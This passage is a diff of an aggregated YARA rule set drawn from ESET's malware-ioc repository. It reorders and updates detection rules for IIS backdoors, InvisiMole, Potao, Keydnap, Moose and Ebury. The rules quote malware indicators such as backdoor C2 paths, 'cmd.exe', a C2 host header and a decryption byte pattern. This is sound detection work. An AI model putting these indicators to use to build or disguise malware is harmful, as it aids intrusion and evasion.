(age), 5 (quality), 0 (score), 0 (importance) * @@ -118458,80 +120326,144 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ import "pe" -private rule ESET_Invisimole_Blob_PRIVATE +private rule ESET_IIS_Native_Module_PRIVATE : FILE { meta: - description = "Detects InvisiMole blobs by magic values" + description = "Signature to match an IIS native module (clean or malicious)" author = "ESET Research" - id = "6a179d91-50f1-5400-b141-0f162efd2431" - date = "2021-05-17" - modified = "2021-05-17" + id = "e3bacdc8-fde1-5e83-ac94-79fc345e888d" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/invisimole/invisimole.yar#L34-L52" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "8bddaf874da58fbe6362498f8979b511f39531fe2b98d4be8c099bdafb6d0067" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L34-L92" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "5a388dc3253df606e2648d1f9c018e6dde373bbddce66dba69b7aecdd95bac18" score = 75 - quality = 80 - tags = "" + quality = 55 + tags = "FILE" license = "BSD 2-Clause" version = "1" strings: - $magic_old_32 = {F9 FF D0 DE} - $magic_old_64 = {64 FF D0 DE} - $magic_new_32 = {86 DA 11 CE} - $magic_new_64 = {64 DA 11 CE} + $e1 = "This module subscribed to event" + $e2 = "CHttpModule::OnBeginRequest" + $e3 = "CHttpModule::OnPostBeginRequest" + $e4 = "CHttpModule::OnAuthenticateRequest" + $e5 = "CHttpModule::OnPostAuthenticateRequest" + $e6 = "CHttpModule::OnAuthorizeRequest" + $e7 = "CHttpModule::OnPostAuthorizeRequest" + $e8 = "CHttpModule::OnResolveRequestCache" + $e9 = "CHttpModule::OnPostResolveRequestCache" + $e10 = "CHttpModule::OnMapRequestHandler" + $e11 = "CHttpModule::OnPostMapRequestHandler" + $e12 = "CHttpModule::OnAcquireRequestState" + $e13 = "CHttpModule::OnPostAcquireRequestState" + $e14 = "CHttpModule::OnPreExecuteRequestHandler" + $e15 = "CHttpModule::OnPostPreExecuteRequestHandler" + $e16 = "CHttpModule::OnExecuteRequestHandler" + $e17 = "CHttpModule::OnPostExecuteRequestHandler" + $e18 = "CHttpModule::OnReleaseRequestState" + $e19 = "CHttpModule::OnPostReleaseRequestState" + $e20 = "CHttpModule::OnUpdateRequestCache" + $e21 = "CHttpModule::OnPostUpdateRequestCache" + $e22 = "CHttpModule::OnLogRequest" + $e23 = "CHttpModule::OnPostLogRequest" + $e24 = "CHttpModule::OnEndRequest" + $e25 = "CHttpModule::OnPostEndRequest" + $e26 = "CHttpModule::OnSendResponse" + $e27 = "CHttpModule::OnMapPath" + $e28 = "CHttpModule::OnReadEntity" + $e29 = "CHttpModule::OnCustomRequestNotification" + $e30 = "CHttpModule::OnAsyncCompletion" + $e31 = "CGlobalModule::OnGlobalStopListening" + $e32 = "CGlobalModule::OnGlobalCacheCleanup" + $e33 = "CGlobalModule::OnGlobalCacheOperation" + $e34 = "CGlobalModule::OnGlobalHealthCheck" + $e35 = "CGlobalModule::OnGlobalConfigurationChange" + $e36 = "CGlobalModule::OnGlobalFileChange" + $e37 = "CGlobalModule::OnGlobalApplicationStart" + $e38 = "CGlobalModule::OnGlobalApplicationResolveModules" + $e39 = "CGlobalModule::OnGlobalApplicationStop" + $e40 = "CGlobalModule::OnGlobalRSCAQuery" + $e41 = "CGlobalModule::OnGlobalTraceEvent" + $e42 = "CGlobalModule::OnGlobalCustomNotification" + $e43 = "CGlobalModule::OnGlobalThreadCleanup" + $e44 = "CGlobalModule::OnGlobalApplicationPreload" condition: - ($magic_old_32 at 0) or ($magic_old_64 at 0) or ($magic_new_32 at 0) or ($magic_new_64 at 0) + uint16(0)==0x5A4D and pe.exports("RegisterModule") and any of ($e*) } -import "elf" +import "pe" -private rule ESET_Apachemodule_PRIVATE +private rule ESET_Not_Ms_PRIVATE { meta: - description = "Apache 2.4 module ELF shared library" - author = "ESET, spol. s r.o." - id = "2082e50e-1726-5540-a962-e0aeca1ebaaf" - date = "2024-04-27" - modified = "2024-04-27" + description = "No description has been set in the source file - ESET" + author = "ESET TI" + id = "7edb96a1-a63a-580e-ac26-66fa14ae97d1" + date = "2018-09-05" + modified = "2018-09-05" + reference = "https://github.com/eset/malware-ioc" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/turla/turla-outlook.yar#L34-L40" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "71f492eaa80bee5e8cc5bec67b2a7fd6f5f71ee2594d9f531043747533c80443" + score = 75 + quality = 80 + tags = "" + + condition: + not for any i in (0..pe.number_of_signatures-1) : (pe.signatures[i].issuer contains "Microsoft Corporation") +} +import "pe" + +private rule ESET_Invisimole_Blob_PRIVATE +{ + meta: + description = "Detects InvisiMole blobs by magic values" + author = "ESET Research" + id = "6a179d91-50f1-5400-b141-0f162efd2431" + date = "2021-05-17" + modified = "2021-05-17" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/windigo/helimod.yar#L3-L30" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - hash = "e39667aa137e315bc26eaef791ccab52938fd809" - logic_hash = "213fe381aa0bf9f148e488f7af74ac63073776c2868e42d2dcca7fdbca55fabb" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/invisimole/invisimole.yar#L34-L52" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "8bddaf874da58fbe6362498f8979b511f39531fe2b98d4be8c099bdafb6d0067" score = 75 quality = 80 tags = "" license = "BSD 2-Clause" - version = 1 + version = "1" strings: - $magic = "42PA" + $magic_old_32 = {F9 FF D0 DE} + $magic_old_64 = {64 FF D0 DE} + $magic_new_32 = {86 DA 11 CE} + $magic_new_64 = {64 DA 11 CE} condition: - for any s in elf.dynsym : (s.type==elf.STT_OBJECT and for any seg in elf.segments : (seg.type==elf.PT_LOAD and s.value>=seg.virtual_address and s.value<(seg.virtual_address+seg.file_size) and $magic at (s.value-seg.virtual_address+seg.offset)+0x28)) + ($magic_old_32 at 0) or ($magic_old_64 at 0) or ($magic_new_32 at 0) or ($magic_new_64 at 0) } -import "pe" - -private rule ESET_Not_Ms_PRIVATE +private rule ESET_Is_Elf_PRIVATE { meta: description = "No description has been set in the source file - ESET" author = "ESET TI" - id = "7edb96a1-a63a-580e-ac26-66fa14ae97d1" - date = "2018-09-05" - modified = "2018-09-05" + id = "6389dc72-ac97-5366-83f2-2e9bcf618ae4" + date = "2016-11-01" + modified = "2016-11-01" reference = "https://github.com/eset/malware-ioc" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/turla/turla-outlook.yar#L34-L40" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "71f492eaa80bee5e8cc5bec67b2a7fd6f5f71ee2594d9f531043747533c80443" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/moose/linux-moose.yar#L32-L39" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "2a3c9a875852cd3ce86d43b9e4a6ba786ecbae1f18bba73a3bef5b7e8ba67a3b" score = 75 quality = 80 tags = "" + strings: + $header = { 7F 45 4C 46 } + condition: - not for any i in (0..pe.number_of_signatures-1) : (pe.signatures[i].issuer contains "Microsoft Corporation") + $header at 0 } private rule ESET_Prikormkaearlyversion_PRIVATE { @@ -118542,8 +120474,8 @@ private rule ESET_Prikormkaearlyversion_PRIVATE date = "2019-08-28" modified = "2019-08-28" reference = "https://github.com/eset/malware-ioc" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/groundbait/prikormka.yar#L112-L128" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/groundbait/prikormka.yar#L112-L128" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "681c7fb322953da162c10b76e453aa8ace6673720012383e3cd5528b59b42de3" score = 75 quality = 28 @@ -118573,8 +120505,8 @@ private rule ESET_Prikormkamodule_PRIVATE date = "2019-08-28" modified = "2019-08-28" reference = "https://github.com/eset/malware-ioc" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/groundbait/prikormka.yar#L53-L110" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/groundbait/prikormka.yar#L53-L110" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "d5d7f1a46cbf9ff545c0fa840228d19ee7d45307078b4ae0b5a2fdf1c94d2978" score = 75 quality = 26 @@ -118629,8 +120561,8 @@ private rule ESET_Prikormkadropper_PRIVATE date = "2019-08-28" modified = "2019-08-28" reference = "https://github.com/eset/malware-ioc" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/groundbait/prikormka.yar#L33-L51" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/groundbait/prikormka.yar#L33-L51" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "cf524cdf4ffeb5c9280c5c8e7fca524c41e1ce4f9bc46b1fc8cb8b50ea68ec39" score = 75 quality = 28 @@ -118651,74 +120583,32 @@ private rule ESET_Prikormkadropper_PRIVATE condition: ($mz at 0) and (( any of ($bin*)) or (3 of ($kd*)) or ( all of ($inj*))) } -import "pe" +import "elf" -private rule ESET_IIS_Native_Module_PRIVATE : FILE +private rule ESET_Apachemodule_PRIVATE { meta: - description = "Signature to match an IIS native module (clean or malicious)" - author = "ESET Research" - id = "e3bacdc8-fde1-5e83-ac94-79fc345e888d" - date = "2021-08-04" - modified = "2021-08-04" + description = "Apache 2.4 module ELF shared library" + author = "ESET, spol. s r.o." + id = "2082e50e-1726-5540-a962-e0aeca1ebaaf" + date = "2024-04-27" + modified = "2024-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L34-L92" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "5a388dc3253df606e2648d1f9c018e6dde373bbddce66dba69b7aecdd95bac18" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/windigo/helimod.yar#L3-L30" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + hash = "e39667aa137e315bc26eaef791ccab52938fd809" + logic_hash = "213fe381aa0bf9f148e488f7af74ac63073776c2868e42d2dcca7fdbca55fabb" score = 75 - quality = 55 - tags = "FILE" + quality = 80 + tags = "" license = "BSD 2-Clause" - version = "1" + version = 1 strings: - $e1 = "This module subscribed to event" - $e2 = "CHttpModule::OnBeginRequest" - $e3 = "CHttpModule::OnPostBeginRequest" - $e4 = "CHttpModule::OnAuthenticateRequest" - $e5 = "CHttpModule::OnPostAuthenticateRequest" - $e6 = "CHttpModule::OnAuthorizeRequest" - $e7 = "CHttpModule::OnPostAuthorizeRequest" - $e8 = "CHttpModule::OnResolveRequestCache" - $e9 = "CHttpModule::OnPostResolveRequestCache" - $e10 = "CHttpModule::OnMapRequestHandler" - $e11 = "CHttpModule::OnPostMapRequestHandler" - $e12 = "CHttpModule::OnAcquireRequestState" - $e13 = "CHttpModule::OnPostAcquireRequestState" - $e14 = "CHttpModule::OnPreExecuteRequestHandler" - $e15 = "CHttpModule::OnPostPreExecuteRequestHandler" - $e16 = "CHttpModule::OnExecuteRequestHandler" - $e17 = "CHttpModule::OnPostExecuteRequestHandler" - $e18 = "CHttpModule::OnReleaseRequestState" - $e19 = "CHttpModule::OnPostReleaseRequestState" - $e20 = "CHttpModule::OnUpdateRequestCache" - $e21 = "CHttpModule::OnPostUpdateRequestCache" - $e22 = "CHttpModule::OnLogRequest" - $e23 = "CHttpModule::OnPostLogRequest" - $e24 = "CHttpModule::OnEndRequest" - $e25 = "CHttpModule::OnPostEndRequest" - $e26 = "CHttpModule::OnSendResponse" - $e27 = "CHttpModule::OnMapPath" - $e28 = "CHttpModule::OnReadEntity" - $e29 = "CHttpModule::OnCustomRequestNotification" - $e30 = "CHttpModule::OnAsyncCompletion" - $e31 = "CGlobalModule::OnGlobalStopListening" - $e32 = "CGlobalModule::OnGlobalCacheCleanup" - $e33 = "CGlobalModule::OnGlobalCacheOperation" - $e34 = "CGlobalModule::OnGlobalHealthCheck" - $e35 = "CGlobalModule::OnGlobalConfigurationChange" - $e36 = "CGlobalModule::OnGlobalFileChange" - $e37 = "CGlobalModule::OnGlobalApplicationStart" - $e38 = "CGlobalModule::OnGlobalApplicationResolveModules" - $e39 = "CGlobalModule::OnGlobalApplicationStop" - $e40 = "CGlobalModule::OnGlobalRSCAQuery" - $e41 = "CGlobalModule::OnGlobalTraceEvent" - $e42 = "CGlobalModule::OnGlobalCustomNotification" - $e43 = "CGlobalModule::OnGlobalThreadCleanup" - $e44 = "CGlobalModule::OnGlobalApplicationPreload" + $magic = "42PA" condition: - uint16(0)==0x5A4D and pe.exports("RegisterModule") and any of ($e*) + for any s in elf.dynsym : (s.type==elf.STT_OBJECT and for any seg in elf.segments : (seg.type==elf.PT_LOAD and s.value>=seg.virtual_address and s.value<(seg.virtual_address+seg.file_size) and $magic at (s.value-seg.virtual_address+seg.offset)+0x28)) } private rule ESET_Potaosecondstage_PRIVATE { @@ -118729,8 +120619,8 @@ private rule ESET_Potaosecondstage_PRIVATE date = "2015-07-30" modified = "2015-07-30" reference = "https://github.com/eset/malware-ioc" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/potao/PotaoNew.yara#L81-L95" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/potao/PotaoNew.yara#L81-L95" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "55f9fc2da09aa9c2e76725985c836f7b8ba5e0b69a9327fb911e8265b340b88c" score = 75 quality = 28 @@ -118756,8 +120646,8 @@ private rule ESET_Potaousb_PRIVATE date = "2015-07-30" modified = "2015-07-30" reference = "https://github.com/eset/malware-ioc" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/potao/PotaoNew.yara#L71-L80" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/potao/PotaoNew.yara#L71-L80" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "8f72afbf3b123ea3914b3eade267bd21f7435fbf9fbde4049ca2600513bb31d9" score = 75 quality = 28 @@ -118780,8 +120670,8 @@ private rule ESET_Potaodll_PRIVATE date = "2015-07-30" modified = "2015-07-30" reference = "https://github.com/eset/malware-ioc" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/potao/PotaoNew.yara#L46-L70" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/potao/PotaoNew.yara#L46-L70" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "1d1154eb10cc70b3252e3ca4a85789e8605f2f3b7044f03ec960fd56ab81886a" score = 75 quality = 28 @@ -118818,8 +120708,8 @@ private rule ESET_Potaodecoy_PRIVATE date = "2015-07-30" modified = "2015-07-30" reference = "https://github.com/eset/malware-ioc" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/potao/PotaoNew.yara#L32-L45" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/potao/PotaoNew.yara#L32-L45" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "93cbe1d1545d1fb85b3218b68619e67a1dda80d5888d2685a04915b861dfce01" score = 75 quality = 28 @@ -118837,193 +120727,6 @@ private rule ESET_Potaodecoy_PRIVATE condition: ($mz at 0) and (( all of ($str*)) or any of ($old_ver*) or $wiki_str) } -private rule ESET_Is_Elf_PRIVATE -{ - meta: - description = "No description has been set in the source file - ESET" - author = "ESET TI" - id = "6389dc72-ac97-5366-83f2-2e9bcf618ae4" - date = "2016-11-01" - modified = "2016-11-01" - reference = "https://github.com/eset/malware-ioc" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/moose/linux-moose.yar#L32-L39" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "2a3c9a875852cd3ce86d43b9e4a6ba786ecbae1f18bba73a3bef5b7e8ba67a3b" - score = 75 - quality = 80 - tags = "" - - strings: - $header = { 7F 45 4C 46 } - - condition: - $header at 0 -} -rule ESET_Keydnap_Downloader -{ - meta: - description = "OSX/Keydnap Downloader" - author = "Marc-Etienne M.Léveillé" - id = "2b21007a-b143-5538-8777-ba35448d00aa" - date = "2016-07-06" - modified = "2016-07-06" - reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/keydnap/keydnap.yar#L33-L49" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "71c8885193a92fa9c71055c37e629a54d50070cf6820b9216a824ecc4db2ce3c" - score = 75 - quality = 80 - tags = "" - version = "1" - - strings: - $ = "icloudsyncd" - $ = "killall Terminal" - $ = "open %s" - - condition: - 2 of them -} -rule ESET_Keydnap_Backdoor_Packer -{ - meta: - description = "OSX/Keydnap packed backdoor" - author = "Marc-Etienne M.Léveillé" - id = "f29ad5af-bc86-5764-9451-5a8363788c4e" - date = "2016-07-06" - modified = "2016-07-06" - reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/keydnap/keydnap.yar#L51-L67" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "b1740bf38376be81d3b42306c2ce81f578c0b5c9db804f063836bf98f57ed147" - score = 75 - quality = 80 - tags = "" - version = "1" - - strings: - $upx_string = "This file is packed with the UPX" - $packer_magic = "ASS7" - $upx_magic = "UPX!" - - condition: - $upx_string and $packer_magic and not $upx_magic -} -rule ESET_Keydnap_Backdoor -{ - meta: - description = "Unpacked OSX/Keydnap backdoor" - author = "Marc-Etienne M.Léveillé" - id = "099c1796-6237-5ec1-ba25-cd5feca79865" - date = "2016-07-06" - modified = "2016-07-06" - reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/keydnap/keydnap.yar#L69-L86" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "fa209577a562ef9088d3ad3df3fbc0edda96f09d19177842f0ddea42c658f530" - score = 75 - quality = 80 - tags = "" - version = "1" - - strings: - $ = "api/osx/get_task" - $ = "api/osx/cmd_executed" - $ = "Loader-" - $ = "u2RLhh+!LGd9p8!ZtuKcN" - $ = "com.apple.iCloud.sync.daemon" - - condition: - 2 of them -} -rule ESET_Moose_1 -{ - meta: - description = "No description has been set in the source file - ESET" - author = "ESET TI" - id = "4d228de6-ddbf-57c0-a330-5840c4d40dfc" - date = "2015-04-21" - modified = "2016-11-01" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/moose/linux-moose.yar#L41-L76" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "8bedac80a1f754ce56294ba9786b62a002aacd074f756724401efc61def127e6" - score = 75 - quality = 30 - tags = "" - Author = "Thomas Dupuy" - Description = "Linux/Moose malware" - Contact = "github@eset.com" - License = "BSD 2-Clause" - - strings: - $s0 = "Status: OK" - $s1 = "--scrypt" - $s2 = "stratum+tcp://" - $s3 = "cmd.so" - $s4 = "/Challenge" - $s7 = "processor" - $s9 = "cpu model" - $s21 = "password is wrong" - $s22 = "password:" - $s23 = "uthentication failed" - $s24 = "sh" - $s25 = "ps" - $s26 = "echo -n -e " - $s27 = "chmod" - $s28 = "elan2" - $s29 = "elan3" - $s30 = "chmod: not found" - $s31 = "cat /proc/cpuinfo" - $s32 = "/proc/%s/cmdline" - $s33 = "kill %s" - - condition: - ESET_Is_Elf_PRIVATE and all of them -} -rule ESET_Moose_2 -{ - meta: - description = "No description has been set in the source file - ESET" - author = "ESET TI" - id = "74372984-dace-5665-a5d0-39b8d1002fa1" - date = "2016-10-02" - modified = "2016-11-01" - reference = "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/moose/linux-moose.yar#L78-L110" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "3f50d2d81d4c27e44d93804adcf93971017767ed0e020447cdb343931c2fbc43" - score = 75 - quality = 80 - tags = "" - Author = "Thomas Dupuy" - Description = "Linux/Moose malware active since September 2015" - Contact = "github@eset.com" - License = "BSD 2-Clause" - - strings: - $s1 = "Modules are loaded" - $s2 = "--scrypt" - $s3 = "http://" - $s4 = "https://" - $s5 = "processor " - $s6 = "cpu model " - $s7 = "Host: www.challpok.cn" - $s8 = "Cookie: PHPSESSID=%s; nhash=%s; chash=%s" - $s9 = "fail!" - $s10 = "H3lL0WoRlD" - $s11 = "crondd" - $s12 = "cat /proc/cpuinfo" - $s13 = "Set-Cookie: PHPSESSID=" - $s14 = "Set-Cookie: LP=" - $s15 = "Set-Cookie: WL=" - $s16 = "Set-Cookie: CP=" - $s17 = "Loading modules..." - $s18 = "-nobg" - - condition: - ESET_Is_Elf_PRIVATE and 5 of them -} rule ESET_Potao { meta: @@ -119033,8 +120736,8 @@ rule ESET_Potao date = "2015-07-29" modified = "2015-07-30" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/potao/PotaoNew.yara#L96-L108" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/potao/PotaoNew.yara#L96-L108" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" logic_hash = "c68addb14f7c22cec0c4d58bfffd373b2e3eb5c53a5b65532c84574e073fcbba" score = 75 quality = 80 @@ -119047,550 +120750,846 @@ rule ESET_Potao condition: ESET_Potaodecoy_PRIVATE or ESET_Potaodll_PRIVATE or ESET_Potaousb_PRIVATE or ESET_Potaosecondstage_PRIVATE } -import "pe" +import "elf" -rule ESET_IIS_Group02 +rule ESET_Libkeyutils_With_Ctor { meta: - description = "Detects Group 2 native IIS malware family" - author = "ESET Research" - id = "945e3748-1072-55f3-abaa-903dfc250294" - date = "2021-08-04" - modified = "2021-08-04" + description = "This rule detects if a libkeyutils.so shared library has a potentially malicious function to be called when loaded, either via a glibc constructor (DT_INIT + .ctors) or an initializer function in DT_INIT_ARRAY." + author = "ESET, spol. s r.o." + id = "7b466bf7-f895-569d-99b0-eca95a6ebc83" + date = "2024-02-01" + modified = "2024-04-29" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L134-L155" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "3fa2b8fed3c580f446b55412a920a5cfed2317b06aa93d059e9f89fdbec8f683" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/windigo/ebury.yar#L3-L54" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + hash = "e7debd6e453192ad8376db5bab03ed0d87566591" + logic_hash = "c6172aebc67a05fb044b0450aafcc71c7d1fd2831985587d1a9ad53f59e14214" score = 75 - quality = 76 + quality = 80 tags = "" license = "BSD 2-Clause" - version = "1" + version = 2 strings: - $s1 = "HttpModule.pdb" ascii wide - $s2 = "([\\w+%]+)=([^&]*)" - $s3 = "([\\w+%]+)=([^!]*)" - $s4 = "cmd.exe" - $s5 = "C:\\Users\\Iso\\Documents\\Visual Studio 2013\\Projects\\IIS 5\\x64\\Release\\Vi.pdb" ascii wide - $s6 = "AVRSAFunction" + $libname = "libkeyutils.so.1" condition: - ESET_IIS_Native_Module_PRIVATE and 3 of ($s*) + for any ptr_size in (4,8) : (((ptr_size==4 and elf.machine==elf.EM_386) or (ptr_size==8 and elf.machine==elf.EM_X86_64)) and for any d in elf.dynamic : (d.type==elf.DT_SONAME and ( for any s in elf.sections : (s.name==".dynstr" and $libname at (s.offset+d.val)) or for any s in elf.dynamic : (s.type==elf.DT_STRTAB and $libname at (s.val+d.val)))) and ( for any s in elf.sections : (s.name==".ctors" and s.size>2*ptr_size) or for any d in elf.dynamic : (d.type==elf.DT_INIT_ARRAYSZ and d.val>ptr_size))) } -import "pe" +import "elf" -rule ESET_IIS_Group03 +rule ESET_Ebury_V1_7_Crypto { meta: - description = "Detects Group 3 native IIS malware family" - author = "ESET Research" - id = "9caf9b3e-611e-5e0e-a7ee-9e7515679022" - date = "2021-08-04" - modified = "2021-08-04" + description = "This rule detects the strings decryption routine in Ebury v1.7 and v1.8" + author = "ESET, spol. s r.o." + id = "93dadf5f-b572-5217-8c82-4957c6d24955" + date = "2023-08-01" + modified = "2024-04-29" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L157-L176" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "d811c2ac610780bf968e86e8fd302cffc9434902e547399d06fdeb30d1719f51" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/windigo/ebury.yar#L56-L97" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + hash = "e7debd6e453192ad8376db5bab03ed0d87566591" + logic_hash = "41908951069a472d7528f2f228f3681f008d16a0436e341d339909efc4933e66" score = 75 quality = 80 tags = "" license = "BSD 2-Clause" - version = "1" + version = 1 strings: - $s1 = "IIS-Backdoor.dll" - $s2 = "CryptStringToBinaryA" - $s3 = "CreateProcessA" - $s4 = "X-Cookie" + $64 = { + 48 69 ( 9C 24 ?? ?? ?? ?? | 5C 24 ?? | D2) 6D 4E C6 41 // imul rbx, [rsp+_buf], 41C64E6Dh + 8B (0C 16 | 34 07) // mov ecx, [rsi+rdx] + 48 81 C? 39 30 00 00 // add rbx, 12345 + ( 31 D? | // xor ecx, ebx + 31 D? 48 89 9C 24 ?? ?? ?? ?? | // mov [rsp+_buf], rbx + 31 D? 48 89 5C 24 ?? ) // ^ optional + 89 (0C 10 | 34 01) // mov [rax+rdx], ecx + 48 83 C? 04 